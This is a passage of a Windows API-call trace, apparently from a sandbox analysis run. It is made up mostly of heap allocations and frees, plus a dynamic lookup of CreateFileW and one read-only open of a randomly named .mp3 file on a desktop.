dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0122.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0122.467] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.473] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0122.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0122.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.473] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0122.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0122.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0122.475] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CgH9zawVTY35raopEyZt.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\cgh9zawvty35raopeyzt.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0122.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.476] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.478] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.478] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.478] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: 